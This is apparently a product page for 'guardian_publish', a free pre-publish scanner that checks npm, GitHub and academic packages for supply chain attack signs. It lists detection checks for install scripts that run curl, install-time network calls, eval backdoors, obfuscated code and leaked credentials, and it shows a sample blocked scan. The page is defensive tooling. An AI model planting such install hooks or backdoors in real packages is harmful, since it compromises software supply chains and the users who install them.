no_hardcoded_ips — detects IPv4/IPv6 addresses embedded in source code
SECURITY
guardian_publish
FREE
Pre-publish supply chain verification. Catches hardcoded IPs, obfuscated code, dangerous install scripts, binary files, and credential leaks before they reach production. Six profiles for different publishing contexts.
CAPABILITIES
10 Supply Chain Checks
Guardian Publish scans your project directory for the most common supply chain attack vectors. Each check is classified by severity—CRITICAL, HIGH, or MEDIUM—and a BLOCKED verdict stops compromised packages from publishing.
Use the .50c-security.json allowlist for project-level overrides when you have known safe patterns that would otherwise trigger findings.
no_obfuscated_code — flags base64 blobs, hex-encoded strings, char code arrays
no_suspicious_urls — catches external URLs in unexpected locations
no_dangerous_scripts — flags preinstall/postinstall scripts that run arbitrary code
no_binary_files — detects compiled binaries or executables in the package
no_env_leaks — catches .env files, API keys, tokens, and secrets in source
no_network_calls — flags fetch/http/net calls in install-time code
no_dynamic_requires — detects eval(), Function(), and dynamic require() patterns
no_minified_without_source — flags minified files lacking corresponding source maps
npm_diff_check — compares published package against source for injected code
Severity Levels
CRITICAL
Immediate threat. Blocks publishing.
HIGH
Serious concern. Manual review required.
MEDIUM
Worth investigating. May be intentional.
6 Verification Profiles
npm
github
arxiv
medical
science
math
Each profile tailors checks to the publishing context. Academic profiles (arxiv, medical, science, math) use AI tools for content verification.
EXAMPLE
Scan Before Publishing to npm
MCP Tool Call
// Request
{
"name": "guardian_publish",
"arguments": {
"profile": "npm",
"save_receipt": true
}
}
// Response
{
"verdict": "BLOCKED",
"supply_chain": {
"checks_run": 10,
"passed": 8,
"failed": 2,
"findings": [
{
"check": "no_hardcoded_ips",
"severity": "CRITICAL",
"file": "lib/config.js",
"line": 47,
"detail": "IPv4 address 185.143.xx.xx found"
},
{
"check": "no_dangerous_scripts",
"severity": "HIGH",
"file": "package.json",
"detail": "postinstall script runs curl"
}
]
},
"receipt": "guardian-receipt-2026-03-03.md"
}
CLI Usage
Terminal
# Scan current directory with npm profile
npx 50c guardian-publish --profile npm
# Scan for GitHub release
npx 50c guardian-publish --profile github
# Academic paper verification
npx 50c guardian-publish --profile arxiv --save-receipt
# Scan a specific directory
npx 50c guardian-publish --cwd ./packages/core --profile npm
Allowlist Configuration
.50c-security.json
{
"allowlist": {
"ips": ["127.0.0.1", "::1"],
"urls": ["https://registry.npmjs.org"],
"files": ["vendor/legacy.min.js"]
}
}
USE CASES
Stop Supply Chain Attacks Before They Ship
npm Package Publishing
Run before every npm publish. Catches injected IPs, eval backdoors, and credential leaks that automated scanners miss.
GitHub Release Validation
Verify your release artifacts are clean before tagging. Detect binaries, minified code without source maps, and suspicious URLs.
Academic Paper Submission
Use arxiv, medical, science, or math profiles to verify academic content with AI-powered checks before submission.
CI/CD Gate
Add as a pre-publish step in your CI pipeline. A BLOCKED verdict exits non-zero, halting the release automatically.
Monorepo Scanning
Point at individual packages within a monorepo using the cwd parameter. Scan each package independently before publish.
Audit Trail
Generate detailed receipts documenting every check, finding, and verdict. Attach to release notes or compliance records.
Never Publish a Compromised Package
Guardian Publish is free for all 50c users. 10 supply chain checks, 6 profiles, zero cost.
Get Started Free